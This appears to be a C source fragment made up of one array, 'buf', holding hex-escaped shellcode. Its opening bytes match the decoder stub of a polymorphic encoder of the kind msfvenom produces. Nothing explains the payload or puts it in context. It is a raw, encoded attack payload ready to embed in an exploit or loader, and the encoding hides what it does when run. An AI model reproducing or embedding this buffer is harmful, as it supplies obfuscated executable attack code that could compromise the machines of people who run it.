unsigned char buf[] = 
"\xdb\xc3\xbf\xae\xe0\xb0\xbe\xd9\x74\x24\xf4\x58\x31\xc9"
"\xb1\x27\x83\xe8\xfc\x31\x78\x14\x03\x78\xba\x02\x45\xd8"
"\x78\xf3\xa6\x25\x7c\x92\x1f\x4d\x7c\x5a\x60\xe8\xc7\x5b"
"\x60\xf4\x37\x3a\xd8\xf0\x37\xc2\x18\x34\xb7\xa4\xa0\xc5"
"\xb7\x28\xd1\xaf\x0c\x28\xd1\x2f\x72\x4f\x68\xb3\x72\x8f"
"\x8a\xaa\xc8\x9f\x8a\x32\x2c\x6d\x0a\x54\x95\x7d\x0b\x99"
"\xe5\x1a\x81\x18\x79\xe4\x95\x1a\xbd\xef\xe1\x10\xdb\xa6"
"\x6f\xa6\xda\x39\x04\xbb\xf7\xd1\x82\x03\x9b\x26\x4b\x74"
"\xc5\x27\x83\x12\x41\x4f\x99\xc3\xd1\x6c\x9c\x95\x69\x73"
"\x9f\x59\x89\xb9\x1f\x1c\xe7\x35\x52\xfa\x85\x95\xe7\x6a"
"\x49\xb8\x68\x1e\xeb\x36\x12\xc0\xc3\xc4\xb9\x74\x7c\x5c"
"\x30\x1b\xe7\xbe\x85\xc3\x94\xd7\xc5\x6a\x37\x58\x67\x04"
"\xb5\xb4\x47\xe6\x19\xb6\xee\x68\x36\x56\xd8\x4e";
